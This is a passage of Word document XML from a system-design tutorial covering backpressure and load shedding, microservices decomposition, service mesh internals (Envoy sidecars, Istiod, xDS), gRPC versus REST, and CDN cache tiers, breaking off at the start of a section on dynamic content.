    <w:p w14:paraId="188C03A7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefetch limit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> RabbitMQ's basic.qos limits how many unacknowledged messages the broker sends to a consumer at once. If the consumer is processing slowly, it doesn't acknowledge messages, hits the prefetch limit, and the broker stops sending more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74DC62" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consumer-initiated pause:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Consumer explicitly sends a flow control message telling the broker to pause delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743776B6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-level backpressure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> When your application's internal queues are full (worker thread pool saturated, in-memory queue at capacity), reject or delay new incoming requests rather than accepting them and letting them pile up. Return 503 Service Unavailable with Retry-After header. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>load shedding</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> as a backpressure mechanism — better to explicitly reject 20% of requests and serve 80% well than to silently queue all requests and serve 100% poorly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED21F87" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="7A75723F">
          <v:rect id="_x0000_i2429" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1037D0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Microservices Scaling — The Decomposition Trade-off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A0220" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Decompose — Independent Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F705E1E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A monolith scales as a unit — you scale the entire application even if only one component is under load. Microservices enable </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>targeted scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>: scale the checkout service to 100 instances during a sale event while the user profile service stays at 5 instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D76C3C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>But decomposition introduces costs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FEA46" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Every service-to-service call is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>network call</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> with latency, potential failure, and serialization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AB6D47" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each additional hop in a request chain reduces composite availability (as established in the Availability section).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8BFB35" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Distributed tracing, centralized logging, and service mesh are now required for operational sanity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513105DB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="221"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Data consistency across services requires complex patterns (Saga, eventual consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BA8816" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The decomposition criterion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Services should be decomposed along </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failure and scaling boundaries</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>, not just feature boundaries. If two components always fail together or scale together, they should be in the same service. If they have different scaling profiles or failure isolation requirements, they should be separate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03928D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Mesh — What It Actually Does Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771A0DE6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A service mesh (Istio, Linkerd) injects a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sidecar proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (Envoy) into every service pod. All network traffic enters and exits the pod through this proxy. The application is unaware of the proxy — it thinks it's communicating directly with other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94394D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>data plane</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (the sidecar proxies) handles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A67057A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mTLS (mutual TLS):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every service-to-service connection is encrypted and both sides are authenticated via certificates. Certificate rotation is automated. Services can't communicate without valid certs → automatic service identity and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A1699" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The sidecar proxy does client-side load balancing, distributing requests to upstream service instances. More intelligent than DNS-based load balancing (which only balances at connection level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51E064" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit breaking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Configured per-upstream-service. If an upstream service is failing, the sidecar opens the circuit and fails fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A635A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retry logic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Configurable retries with exponential backoff, transparent to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D623375" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observability:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Every request generates telemetry — metrics, traces, logs — automatically, without application code changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CFF73" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>control plane</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (Istiod) manages the data plane:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C0A07D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Distributes service discovery information to all sidecar proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9C0B6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Pushes traffic management rules (routing, retries, circuit breaking config).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2F623" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Issues and rotates certificates for mTLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13696566" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xDS protocol:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The control plane communicates with sidecars via </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xDS (eXtensible Discovery Service)</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — a set of Envoy's discovery APIs (CDS: Cluster Discovery Service, EDS: Endpoint Discovery Service, LDS: Listener Discovery Service, RDS: Route Discovery Service). Proxies maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>long-lived gRPC streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> to the control plane and receive configuration updates as they change. This streaming model means configuration updates propagate to all sidecars in seconds, without polling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63B4DF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gRPC vs REST — Why It Matters for Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051EBF68" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REST over HTTP/1.1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Each request requires a TCP connection (or connection from a pool). HTTP/1.1 is </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>head-of-line blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — requests on the same connection are serialized. A slow request blocks all subsequent requests on that connection. Connection pools mitigate this but add overhead (connection state management).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A1BDF2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>JSON serialization/deserialization is CPU-intensive. A complex nested JSON object with 100 fields requires significant CPU to parse — at 100,000 RPS, this is a meaningful CPU budget.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63009320" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC over HTTP/2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> HTTP/2 multiplexes multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> over a single TCP connection. A slow request on stream 1 doesn't block a fast request on stream 2 — true concurrency over one TCP connection. At 100,000 RPS between two services, you might need just 10–20 long-lived TCP connections instead of thousands of short-lived connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281924E4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol Buffers</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> serialize to binary — typically 3–10x smaller payloads than JSON and </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5–10x faster serialization/deserialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. Smaller payloads mean less network bandwidth and less time to transmit, directly reducing latency under high load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A918BD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC streaming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> gRPC supports bidirectional streaming — server can push multiple responses to a single client request, client can send multiple requests in one stream. This is ideal for real-time updates (streaming database results, event streams) without the overhead of WebSocket or long-polling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2709AA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="06ACE55C">
          <v:rect id="_x0000_i2430" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA9407" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Content Delivery Networks — Global Scale Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD9F24" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CDN Caching Works Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF16AC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>A CDN edge node is essentially a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse proxy with a large cache</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. When a request arrives at an edge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA5A237" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Compute the </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache key</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> from the request — typically URL + selected headers (e.g., Accept-Encoding, Accept-Language). The cache key determines whether two requests are for the same logical resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4D211A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Check the local cache (in-memory + SSD). If found and not expired → </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache hit</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>, serve immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFBA582" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>On cache miss → </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>origin fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>: the edge connects to the origin server (or a parent edge in a multi-tier CDN hierarchy), fetches the response, caches it locally based on Cache-Control headers, and serves the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D093582" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tiered CDN architecture:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Large CDNs (Cloudflare, Akamai, Fastly) use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>two-tier or three-tier hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556886D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Edge PoPs (Points of Presence):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Thousands of locations worldwide. Handle user requests. Small caches (limited by PoP hardware).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BCB362" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Regional shield PoPs (mid-tier):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Fewer locations (50–100). Larger caches. When an edge misses, it fetches from the regional shield, not the origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293AA51F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="225"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Origin:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Your actual servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD6D1A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The regional shield dramatically reduces origin load. Instead of 1,000 edge PoPs all fetching a cache miss from origin simultaneously, they all fetch from the regional shield. The shield fetches from origin only once, caches the result, and serves all 1,000 edge requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAF6C4A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache hit ratio</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> is the key metric — the fraction of requests served from cache. A 95% cache hit ratio means only 5% of requests reach origin. A 99% ratio means 1% reach origin — an 80% reduction in origin load vs 95%. Improving cache hit ratio from 95% to 99% has </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>massive</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> infrastructure cost implications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA37A9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Factors affecting cache hit ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609633FF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>TTL values (longer TTL → higher hit ratio, but staler content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D55A329" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>URL normalization (canonicalize query parameters to avoid cache fragmentation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596160D1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Vary header management (Vary: Accept-Encoding creates separate cache entries for compressed and uncompressed responses — important but can fragment cache if overused).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC14C3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Content personalization (personalized responses can't be cached or have very low hit rates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45205B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN and Dynamic Content</w:t>
